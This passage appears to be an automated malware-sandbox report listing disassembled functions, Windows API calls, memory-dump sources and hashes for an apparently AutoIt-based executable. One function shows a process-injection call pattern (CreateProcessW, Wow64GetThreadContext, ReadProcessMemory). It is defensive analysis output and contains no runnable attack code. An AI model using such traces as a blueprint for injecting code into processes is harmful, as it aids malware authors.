                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00959548,?,?,?,?,?,00000004), ref: 009598BB
                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00959548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009598D1
                                                                  • CloseHandle.KERNEL32(00000000,?,00959548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009598D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleTime
                                                                  • String ID:
                                                                  • API String ID: 3397143404-0
                                                                  • Opcode ID: 54b6972094890fd332fb4009d5cb3f9bbf6b3b14044f67addc71ad9d8efbcb52
                                                                  • Instruction ID: 3feae1876831b8e7a0b9f0f5614b2222ac5bd7baa4b7c33e62817f204cb8bb9a
                                                                  • Opcode Fuzzy Hash: 54b6972094890fd332fb4009d5cb3f9bbf6b3b14044f67addc71ad9d8efbcb52
                                                                  • Instruction Fuzzy Hash: D9E08633149214FBE7211B64EC09FCA7B59AB06761F104120FB18790E087B12551A798
                                                                  Function 00958D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00958D1B
                                                                    • Part of subcall function 00912D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00919A24), ref: 00912D69
                                                                    • Part of subcall function 00912D55: GetLastError.KERNEL32(00000000,?,00919A24), ref: 00912D7B
                                                                  • _free.LIBCMT ref: 00958D2C
                                                                  • _free.LIBCMT ref: 00958D3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                  • Instruction ID: 89b5d146368cdc52572dfbdb2b86b3cdfc8f1b585eb72aacb99044ca1076d27c
                                                                  • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                  • Instruction Fuzzy Hash: B5E017A170160546CB24F6BAF940BD723FC4F98353B54091EB80EE71D6DEA4F8968328
                                                                  Function 008FA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CALL
                                                                  • API String ID: 0-4196123274
                                                                  • Opcode ID: 3046301eb93821c4383045b13276c6001108ab8bf2a7412395927860524f0b34
                                                                  • Instruction ID: e31b11c4f758aef25d289523f0721b56c5fdcbddfa3a18bc819a3904faffb88a
                                                                  • Opcode Fuzzy Hash: 3046301eb93821c4383045b13276c6001108ab8bf2a7412395927860524f0b34
                                                                  • Instruction Fuzzy Hash: 512249B4608209DFD728DF24C490B7AB7E1FF88314F14896DE99A9B261D735EC45CB82
                                                                  Function 008F4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 4104443479-3962188686
                                                                  • Opcode ID: 5411d7d06ac4a31252e40c141cea74b5388077e0e7bf8061ee793d25f02de2c0
                                                                  • Instruction ID: 6066004ba7f58fa52e458a2b1befe54351474e365b7196a13792ef6fb6f30e3e
                                                                  • Opcode Fuzzy Hash: 5411d7d06ac4a31252e40c141cea74b5388077e0e7bf8061ee793d25f02de2c0
                                                                  • Instruction Fuzzy Hash: 29419D21A0015C57DF21AB7888517BF7FA5FB45304F286067FF82DB282D6344D4483A2
                                                                  Function 008F7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 80b40dc59eff670f7c44fd7edcc2cf2316980d5bc59dda85bf8bc9441f819d6d
                                                                  • Instruction ID: 41dd6921184c3865a89f97196591d244d29e85130f1a7acf8b414386901a5235
                                                                  • Opcode Fuzzy Hash: 80b40dc59eff670f7c44fd7edcc2cf2316980d5bc59dda85bf8bc9441f819d6d
                                                                  • Instruction Fuzzy Hash: 6031E4B170461AAFD704CF78D8D1E79B3A8FF893207158229E519CB391EB70E960CB90
                                                                  Function 008F47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 008F4834
                                                                    • Part of subcall function 0091336C: __lock.LIBCMT ref: 00913372
                                                                    • Part of subcall function 0091336C: DecodePointer.KERNEL32(00000001,?,008F4849,00947C74), ref: 0091337E
                                                                    • Part of subcall function 0091336C: EncodePointer.KERNEL32(?,?,008F4849,00947C74), ref: 00913389
                                                                    • Part of subcall function 008F48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008F4915
                                                                    • Part of subcall function 008F48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F492A
                                                                    • Part of subcall function 008F3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F3B68
                                                                    • Part of subcall function 008F3B3A: IsDebuggerPresent.KERNEL32 ref: 008F3B7A
                                                                    • Part of subcall function 008F3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009B52F8,009B52E0,?,?), ref: 008F3BEB
                                                                    • Part of subcall function 008F3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 008F3C6F
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F4874
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 1438897964-0
                                                                  • Opcode ID: ff3dee849507f4a830020f4072cfe8915eacab7784d9a1ea4e026c94b6f201ca
                                                                  • Instruction ID: 9704e80d266dc255fd5f94d8d448e9ef653c57e6470f915c9440dd4acde7cbc9
                                                                  • Opcode Fuzzy Hash: ff3dee849507f4a830020f4072cfe8915eacab7784d9a1ea4e026c94b6f201ca
                                                                  • Instruction Fuzzy Hash: 041190719287099BC700DF78D945A1ABBE8FF84760F10462EF194D3271DB709945DB92
                                                                  Function 00910DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0091571C: __FF_MSGBANNER.LIBCMT ref: 00915733
                                                                    • Part of subcall function 0091571C: __NMSG_WRITE.LIBCMT ref: 0091573A
                                                                    • Part of subcall function 0091571C: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,00000000,?,?,?,00910DD3,?), ref: 0091575F
                                                                  • std::exception::exception.LIBCMT ref: 00910DEC
                                                                  • __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                    • Part of subcall function 0091859B: RaiseException.KERNEL32(?,?,?,009A9E78,00000000,?,?,?,?,00910E06,?,009A9E78,?,00000001), ref: 009185F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  • Opcode ID: 5e32d48f52e6c294be512ec1cd9c7eaf266f09780d1bf6add64730390abe15a2
                                                                  • Instruction ID: 3c8ee90a11d6199c92a95eb5ac0b8d4d0eb249b334b03173a2a10d34c8f1d993
                                                                  • Opcode Fuzzy Hash: 5e32d48f52e6c294be512ec1cd9c7eaf266f09780d1bf6add64730390abe15a2
                                                                  • Instruction Fuzzy Hash: F5F0A435A0431D66CB20BB95EC05ADF7BEC9F81351F104869F918962D1DFB29AD092D1
                                                                  Function 009153A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
                                                                  • __lock_file.LIBCMT ref: 009153EB
                                                                    • Part of subcall function 00916C11: __lock.LIBCMT ref: 00916C34
                                                                  • __fclose_nolock.LIBCMT ref: 009153F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: 419779562c8d164b3b6cd6f0e6e66fab797ab269eb039e9306540c02f6cdde82
                                                                  • Instruction ID: e3d9a15d3cdcbc45ea800157f48d2ccf4582b1bc53f841f4492f70cd4bfcb0d7
                                                                  • Opcode Fuzzy Hash: 419779562c8d164b3b6cd6f0e6e66fab797ab269eb039e9306540c02f6cdde82
                                                                  • Instruction Fuzzy Hash: 6CF09631B00A0CDAD7117B6598017EE76A46FC2375F278104A474AB1C1CBFC59C2AB91
                                                                  Function 014140FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 014148BB
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01414951
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01414973
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                  • Instruction ID: 40f80608f07814468e07f2d6a5838b1ad89b783ea1a59df06adf66980d19c968
                                                                  • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                  • Instruction Fuzzy Hash: 9A12EE24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A4F81CF5A
                                                                  Function 00910C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: 2f724e7d72eccc9f4dd2431a220747bcc057553a9ff66a5eb5f6564223b29e4f
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 1931D770B0010A9BC718DF58C5849A9FBA6FB99300B6487A5E88ACB351D772EDC1DFC0
                                                                  Function 0092FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: e098fd6dbc8aa8506dd1cf5352f3a16fe0e6934491802fa231f883026ea847a5
                                                                  • Instruction ID: 74c311d79d597a8cd290a12701add7aec5c6a87cbaeab55dab7bb7233360fffd
                                                                  • Opcode Fuzzy Hash: e098fd6dbc8aa8506dd1cf5352f3a16fe0e6934491802fa231f883026ea847a5
                                                                  • Instruction Fuzzy Hash: 20411A746043558FDB14DF24C454B2ABBE1FF85314F19886CE9998B362C736E845CF52
                                                                  Function 008F7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 67aa3927cbfe37232aac24c20e0921b929b853f65387be4fe327bee5ed696e2a
                                                                  • Instruction ID: be126109ea2f16bf065a4f079bbbd6f583e76966d27790f4ad608f9cf1ea1f50
                                                                  • Opcode Fuzzy Hash: 67aa3927cbfe37232aac24c20e0921b929b853f65387be4fe327bee5ed696e2a
                                                                  • Instruction Fuzzy Hash: F2212472A18A1DEBEB109F61F8817A97BB4FF55360F21846EE58AC51A4EB3080D0D781
                                                                  Function 008F4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 008F4BEF
                                                                    • Part of subcall function 0091525B: __wfsopen.LIBCMT ref: 00915266
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4E0F
                                                                    • Part of subcall function 008F4B6A: FreeLibrary.KERNEL32(00000000), ref: 008F4BA4
                                                                    • Part of subcall function 008F4C70: _memmove.LIBCMT ref: 008F4CBA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                  • String ID:
                                                                  • API String ID: 1396898556-0
                                                                  • Opcode ID: b6794aefa886d00fbdddd172ac047cae4295f1759f455377bfc47325126d7ab5
                                                                  • Instruction ID: 27638aaab589bf1d8380377ce5e4eb9e53a9aaec8b1ccda362b1f386b86e407f
                                                                  • Opcode Fuzzy Hash: b6794aefa886d00fbdddd172ac047cae4295f1759f455377bfc47325126d7ab5
                                                                  • Instruction Fuzzy Hash: 1D11EB3260420DABCF10EF74C812FBF77A8FF84720F10842AF645E7192EA7199149751
                                                                  Function 0092FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 2077436cb29ebfe2fa60866d2830bd04020d59757e08a27c26199df414434b58
                                                                  • Instruction ID: f1998851631ef04758eb634a610b8d690bad1dc39f9e3c91b2ef085b4b6e0b04
                                                                  • Opcode Fuzzy Hash: 2077436cb29ebfe2fa60866d2830bd04020d59757e08a27c26199df414434b58
                                                                  • Instruction Fuzzy Hash: D42104B4608309DFCB14DF64C454B2ABBE0BF88314F058968E98997761D731E855CB92
                                                                  Function 00914863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 009148A6
                                                                    • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: 97e7e0aad9c98a75cc39ea47ca153f3f8dc99f63a6f553cc3adae7831187ec20
                                                                  • Instruction ID: 2a1e33f5c2227d48996c8eb661a9d7f6b264ec1e32ff5e43c545cf0fb0f417f0
                                                                  • Opcode Fuzzy Hash: 97e7e0aad9c98a75cc39ea47ca153f3f8dc99f63a6f553cc3adae7831187ec20
                                                                  • Instruction Fuzzy Hash: 26F02D31B0020CEBDF11AFB0CC063EF36A4AF85325F108444F420AA1C1CBB88AD2EB91
                                                                  Function 008F4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4E7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: ae176055d5b718bb5b1f7d41ca4647e41666441861d7fddae229dd17464cb81b
                                                                  • Instruction ID: 62776c7d6f861dbde9454addf45d4aa01c1ec1bd877c4c94f09badf7f2a5e0b9
                                                                  • Opcode Fuzzy Hash: ae176055d5b718bb5b1f7d41ca4647e41666441861d7fddae229dd17464cb81b
                                                                  • Instruction Fuzzy Hash: DCF0F871515719CFCB349F74D494823B7E1FB54339320992EE2E6C2610C732A880DB40
                                                                  Function 00910791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009107B0
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
